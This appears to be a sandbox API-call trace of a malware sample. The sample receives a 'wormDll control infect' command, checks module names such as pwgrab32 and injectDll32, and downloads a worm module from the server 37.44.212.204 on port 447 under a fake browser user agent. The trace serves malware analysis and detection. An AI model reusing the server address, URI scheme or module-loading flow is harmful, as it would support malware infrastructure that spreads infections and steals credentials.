	[0235.309] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225d20
	[0235.309] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x225d20, dwNumberOfBytesToRead=0x7b, lpdwNumberOfBytesRead=0x128bdc | out: lpBuffer=0x225d20*, lpdwNumberOfBytesRead=0x128bdc*=0x7b) returned 1
	[0235.309] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x0) returned 1
	[0235.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225d20, cbMultiByte=123, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 123
	[0235.309] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311948
	[0235.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225d20, cbMultiByte=123, lpWideCharStr=0x2311948, cchWideChar=123 | out: lpWideCharStr="/62/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/ZwHatEaxHZs8OgxF/68976058/\r\nwormDll control infect\r\n1234567890") returned 123
	[0235.310] StrStrIW (lpFirst="/62/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/ZwHatEaxHZs8OgxF/68976058/\r\nwormDll control infect\r\n1234567890", lpSrch="/") returned="/62/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/ZwHatEaxHZs8OgxF/68976058/\r\nwormDll control infect\r\n1234567890"
	[0235.310] StrStrIW (lpFirst="62/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/ZwHatEaxHZs8OgxF/68976058/\r\nwormDll control infect\r\n1234567890", lpSrch="/") returned="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/ZwHatEaxHZs8OgxF/68976058/\r\nwormDll control infect\r\n1234567890"
	[0235.310] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1528
	[0235.310] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1540
	[0235.310] lstrcpynW (in: lpString1=0x27e1540, lpString2="62/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/ZwHatEaxHZs8OgxF/68976058/\r\nwormDll control infect\r\n1234567890", iMaxLength=3 | out: lpString1="62") returned="62"
	[0235.310] StrStrIW (lpFirst="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/ZwHatEaxHZs8OgxF/68976058/\r\nwormDll control infect\r\n1234567890", lpSrch="/") returned="/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/ZwHatEaxHZs8OgxF/68976058/\r\nwormDll control infect\r\n1234567890"
	[0235.310] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27e1528, Size=0x10) returned 0x27e1558
	[0235.310] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1528
	[0235.310] lstrcpynW (in: lpString1=0x27e1528, lpString2="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/ZwHatEaxHZs8OgxF/68976058/\r\nwormDll control infect\r\n1234567890", iMaxLength=7 | out: lpString1="tot478") returned="tot478"
	[0235.310] StrStrIW (lpFirst="ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/ZwHatEaxHZs8OgxF/68976058/\r\nwormDll control infect\r\n1234567890", lpSrch="/") returned="/ZwHatEaxHZs8OgxF/68976058/\r\nwormDll control infect\r\n1234567890"
	[0235.311] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27e1558, Size=0x10) returned 0x27e1570
	[0235.311] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x70) returned 0x22c8728
	[0235.311] lstrcpynW (in: lpString1=0x22c8728, lpString2="ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/ZwHatEaxHZs8OgxF/68976058/\r\nwormDll control infect\r\n1234567890", iMaxLength=50 | out: lpString1="ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611") returned="ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611"
	[0235.311] StrStrIW (lpFirst="ZwHatEaxHZs8OgxF/68976058/\r\nwormDll control infect\r\n1234567890", lpSrch="/") returned="/68976058/\r\nwormDll control infect\r\n1234567890"
	[0235.311] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27e1570, Size=0x10) returned 0x27e1558
	[0235.311] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a67a0
	[0235.311] lstrcpynW (in: lpString1=0x22a67a0, lpString2="ZwHatEaxHZs8OgxF/68976058/\r\nwormDll control infect\r\n1234567890", iMaxLength=17 | out: lpString1="ZwHatEaxHZs8OgxF") returned="ZwHatEaxHZs8OgxF"
	[0235.311] StrStrIW (lpFirst="68976058/\r\nwormDll control infect\r\n1234567890", lpSrch="/") returned="/\r\nwormDll control infect\r\n1234567890"
	[0235.312] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27e1558, Size=0x20) returned 0x27c0008
	[0235.312] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0030
	[0235.312] lstrcpynW (in: lpString1=0x27c0030, lpString2="68976058/\r\nwormDll control infect\r\n1234567890", iMaxLength=9 | out: lpString1="68976058") returned="68976058"
	[0235.312] StrStrIW (lpFirst="\r\nwormDll control infect\r\n1234567890", lpSrch="/") returned 0x0
	[0235.312] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27c0008, Size=0x20) returned 0x27c0058
	[0235.312] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x50) returned 0x22aaa68
	[0235.312] lstrcpynW (in: lpString1=0x22aaa68, lpString2="\r\nwormDll control infect\r\n1234567890", iMaxLength=37 | out: lpString1="\r\nwormDll control infect\r\n1234567890") returned="\r\nwormDll control infect\r\n1234567890"
	[0235.312] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa50) returned 1
	[0235.312] StrStrIW (lpFirst="\r\nwormDll control infect\r\n1234567890", lpSrch="\r\n") returned="\r\nwormDll control infect\r\n1234567890"
	[0235.312] StrStrIW (lpFirst="wormDll control infect\r\n1234567890", lpSrch="\r\n") returned="\r\n1234567890"
	[0235.313] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa50
	[0235.313] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6378
	[0235.313] lstrcpynW (in: lpString1=0x22a6378, lpString2="wormDll control infect\r\n1234567890", iMaxLength=23 | out: lpString1="wormDll control infect") returned="wormDll control infect"
	[0235.313] StrStrIW (lpFirst="1234567890", lpSrch="\r\n") returned 0x0
	[0235.313] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffa50, Size=0x10) returned 0x22fff90
	[0235.313] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0008
	[0235.313] lstrcpynW (in: lpString1=0x27c0008, lpString2="1234567890", iMaxLength=11 | out: lpString1="1234567890") returned="1234567890"
	[0235.313] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311948) returned 1
	[0235.313] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0058) returned 1
	[0235.313] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22fff90) returned 1
	[0235.313] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225d20) returned 1
	[0235.313] StrStrIW (lpFirst="wormDll control infect", lpSrch=" ") returned=" control infect"
	[0235.313] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22fff90
	[0235.313] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa50
	[0235.313] lstrcpynW (in: lpString1=0x22ffa50, lpString2="wormDll control infect", iMaxLength=8 | out: lpString1="wormDll") returned="wormDll"
	[0235.314] StrStrIW (lpFirst="control infect", lpSrch=" ") returned=" infect"
	[0235.314] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22fff90, Size=0x10) returned 0x22ffee8
	[0235.314] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22fff90
	[0235.314] lstrcpynW (in: lpString1=0x22fff90, lpString2="control infect", iMaxLength=8 | out: lpString1="control") returned="control"
	[0235.314] StrStrIW (lpFirst="infect", lpSrch=" ") returned 0x0
	[0235.314] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffee8, Size=0x10) returned 0x22ff9a8
	[0235.314] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffee8
	[0235.314] lstrcpynW (in: lpString1=0x22ffee8, lpString2="infect", iMaxLength=7 | out: lpString1="infect") returned="infect"
	[0235.314] CryptStringToBinaryW (in: pszString="infect", cchString=0x6, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x128cc0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x128cc0, pdwSkip=0x0, pdwFlags=0x0) returned 1
	[0235.314] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1558
	[0235.314] CryptStringToBinaryW (in: pszString="infect", cchString=0x6, dwFlags=0x7, pbBinary=0x27e1558, pcbBinary=0x128cc0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x27e1558, pcbBinary=0x128cc0, pdwSkip=0x0, pdwFlags=0x0) returned 1
	[0235.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="control", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
	[0235.314] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1570
	[0235.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="control", cchWideChar=-1, lpMultiByteStr=0x27e1570, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="control", lpUsedDefaultChar=0x0) returned 8
	[0235.314] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0058
	[0235.314] lstrcmpiW (lpString1="injectDll32", lpString2="wormDll32") returned -1
	[0235.314] lstrcmpiW (lpString1="pwgrab32", lpString2="wormDll32") returned -1
	[0235.314] lstrcmpiW (lpString1="networkDll32", lpString2="wormDll32") returned -1
	[0235.314] lstrcmpiW (lpString1="psfin32", lpString2="wormDll32") returned -1
	[0235.314] lstrcmpiW (lpString1="shareDll32", lpString2="wormDll32") returned -1
	[0235.314] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0058) returned 1
	[0235.314] lstrcmpiW (lpString1="control", lpString2="start") returned -1
	[0235.314] lstrcmpiW (lpString1="control", lpString2="release") returned -1
	[0235.315] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0058
	[0235.315] lstrcmpiW (lpString1="injectDll32", lpString2="wormDll32") returned -1
	[0235.315] lstrcmpiW (lpString1="pwgrab32", lpString2="wormDll32") returned -1
	[0235.315] lstrcmpiW (lpString1="networkDll32", lpString2="wormDll32") returned -1
	[0235.315] lstrcmpiW (lpString1="psfin32", lpString2="wormDll32") returned -1
	[0235.315] lstrcmpiW (lpString1="shareDll32", lpString2="wormDll32") returned -1
	[0235.315] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0058) returned 1
	[0235.315] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0058
	[0235.315] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c6638
	[0235.315] WinHttpConnect (hSession=0x22c6638, pswzServerName="37.44.212.204", nServerPort=0x1bf, dwReserved=0x0) returned 0x22c6720
	[0235.315] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0148
	[0235.315] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6618
	[0235.315] WinHttpSetTimeouts (hInternet=0x22c6638, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0235.315] WinHttpOpenRequest (hConnect=0x22c6720, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/wormDll32/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27f0c10
	[0235.315] WinHttpSetOption (hInternet=0x27f0c10, dwOption=0x1f, lpBuffer=0x128338, dwBufferLength=0x4) returned 1
	[0235.315] WinHttpSendRequest (hRequest=0x27f0c10, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0238.984] WinHttpReceiveResponse (hRequest=0x27f0c10, lpReserved=0x0) returned 1
	[0238.984] WinHttpQueryHeaders (in: hRequest=0x27f0c10, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128328, lpdwBufferLength=0x128324, lpdwIndex=0x0 | out: lpBuffer=0x128328*, lpdwBufferLength=0x128324*=0x4, lpdwIndex=0x0) returned 1
	[0238.984] WinHttpQueryDataAvailable (in: hRequest=0x27f0c10, lpdwNumberOfBytesAvailable=0x12832c | out: lpdwNumberOfBytesAvailable=0x12832c*=0xee5) returned 1
	[0238.984] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xef0) returned 0x22efc68
	[0238.984] WinHttpReadData (in: hRequest=0x27f0c10, lpBuffer=0x22efc68, dwNumberOfBytesToRead=0xee5, lpdwNumberOfBytesRead=0x128324 | out: lpBuffer=0x22efc68*, lpdwNumberOfBytesRead=0x128324*=0xee5) returned 1
	[0238.985] WinHttpQueryDataAvailable (in: hRequest=0x27f0c10, lpdwNumberOfBytesAvailable=0x12832c | out: lpdwNumberOfBytesAvailable=0x12832c*=0x2000) returned 1
	[0238.985] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22efc68, Size=0x2ef0) returned 0x277bc00
	[0238.985] WinHttpReadData (in: hRequest=0x27f0c10, lpBuffer=0x277cae5, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x128324 | out: lpBuffer=0x277cae5*, lpdwNumberOfBytesRead=0x128324*=0x2000) returned 1
	[0238.985] WinHttpQueryDataAvailable (in: hRequest=0x27f0c10, lpdwNumberOfBytesAvailable=0x12832c | out: lpdwNumberOfBytesAvailable=0x12832c*=0x101c) returned 1
	[0238.985] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x277bc00, Size=0x3f10) returned 0x274a0b8
	[0238.986] WinHttpReadData (in: hRequest=0x27f0c10, lpBuffer=0x274cf9d, dwNumberOfBytesToRead=0x101c, lpdwNumberOfBytesRead=0x128324 | out: lpBuffer=0x274cf9d*, lpdwNumberOfBytesRead=0x128324*=0x101c) returned 1
	[0238.986] WinHttpQueryDataAvailable (in: hRequest=0x27f0c10, lpdwNumberOfBytesAvailable=0x12832c | out: lpdwNumberOfBytesAvailable=0x12832c*=0x2000) returned 1
	[0238.986] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x274a0b8, Size=0x5f10) returned 0x27ccb48
	[0238.986] WinHttpReadData (in: hRequest=0x27f0c10, lpBuffer=0x27d0a49, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x128324 | out: lpBuffer=0x27d0a49*, lpdwNumberOfBytesRead=0x128324*=0x2000) returned 1
	[0238.986] WinHttpQueryDataAvailable (in: hRequest=0x27f0c10, lpdwNumberOfBytesAvailable=0x12832c | out: lpdwNumberOfBytesAvailable=0x12832c*=0x2000) returned 1
	[0238.986] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27ccb48, Size=0x7f10) returned 0x286be98
	[0238.986] WinHttpReadData (in: hRequest=0x27f0c10, lpBuffer=0x2871d99, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x128324 | out: lpBuffer=0x2871d99*, lpdwNumberOfBytesRead=0x128324*=0x2000) returned 1
	[0238.987] WinHttpQueryDataAvailable (in: hRequest=0x27f0c10, lpdwNumberOfBytesAvailable=0x12832c | out: lpdwNumberOfBytesAvailable=0x12832c*=0x2000) returned 1
	[0239.549] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x286be98, Size=0x9f10) returned 0x2873db0
	[0239.550] WinHttpReadData (in: hRequest=0x27f0c10, lpBuffer=0x287bcb1, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x128324 | out: lpBuffer=0x287bcb1*, lpdwNumberOfBytesRead=0x128324*=0x2000) returned 1
	[0239.550] WinHttpQueryDataAvailable (in: hRequest=0x27f0c10, lpdwNumberOfBytesAvailable=0x12832c | out: lpdwNumberOfBytesAvailable=0x12832c*=0x2000) returned 1
	[0239.551] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2873db0, Size=0xbf10) returned 0x287dcc8
	[0239.551] WinHttpReadData (in: hRequest=0x27f0c10, lpBuffer=0x2887bc9, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x128324 | out: lpBuffer=0x2887bc9*, lpdwNumberOfBytesRead=0x128324*=0x2000) returned 1
	[0239.552] WinHttpQueryDataAvailable (in: hRequest=0x27f0c10, lpdwNumberOfBytesAvailable=0x12832c | out: lpdwNumberOfBytesAvailable=0x12832c*=0x101f) returned 1
	[0239.554] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x287dcc8, Size=0xcf20) returned 0x286be98
	[0239.554] WinHttpReadData (in: hRequest=0x27f0c10, lpBuffer=0x2877d99, dwNumberOfBytesToRead=0x101f, lpdwNumberOfBytesRead=0x128324 | out: lpBuffer=0x2877d99*, lpdwNumberOfBytesRead=0x128324*=0x101f) returned 1
	[0239.555] WinHttpQueryDataAvailable (in: hRequest=0x27f0c10, lpdwNumberOfBytesAvailable=0x12832c | out: lpdwNumberOfBytesAvailable=0x12832c*=0x0) returned 1
	[0239.555] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xc0) returned 0x22ac3a8
	[0239.555] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x2892008
	[0239.555] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.557] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.557] CryptHashData (hHash=0x22b6840, pbData=0x2892008, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0239.557] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.557] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf9f0
	[0239.557] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x27bf9f0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf9f0, pdwDataLen=0x128ba4) returned 1
	[0239.557] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0239.557] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.557] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.558] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.558] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0239.558] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.558] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bfa40
	[0239.558] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27bfa40, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bfa40, pdwDataLen=0x128ba4) returned 1
	[0239.558] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.558] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.558] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.558] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.558] CryptHashData (hHash=0x22b6840, pbData=0x2892008, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0239.558] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.558] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bfa68
	[0239.558] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x27bfa68, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bfa68, pdwDataLen=0x128ba4) returned 1
	[0239.558] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0239.559] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.559] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.559] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.559] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0239.559] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.559] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bfab8
	[0239.559] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27bfab8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bfab8, pdwDataLen=0x128ba4) returned 1
	[0239.559] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.559] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.559] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.560] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.560] CryptHashData (hHash=0x22b6840, pbData=0x2892008, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0239.560] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.560] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bfae0
	[0239.560] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x27bfae0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bfae0, pdwDataLen=0x128ba4) returned 1
	[0239.560] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0239.560] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.560] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.561] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.561] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0239.561] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.561] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bfb08
	[0239.561] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27bfb08, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bfb08, pdwDataLen=0x128ba4) returned 1
	[0239.561] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.561] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.561] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.561] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.561] CryptHashData (hHash=0x22b6840, pbData=0x2892008, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0239.561] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.561] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bfb30
	[0239.561] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x27bfb30, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bfb30, pdwDataLen=0x128ba4) returned 1
	[0239.561] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0239.561] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.561] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.562] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.562] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0239.562] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.562] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bfb58
	[0239.562] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27bfb58, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bfb58, pdwDataLen=0x128ba4) returned 1
	[0239.562] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.562] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.562] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.563] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.563] CryptHashData (hHash=0x22b6840, pbData=0x2892008, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0239.563] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.563] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bfb80
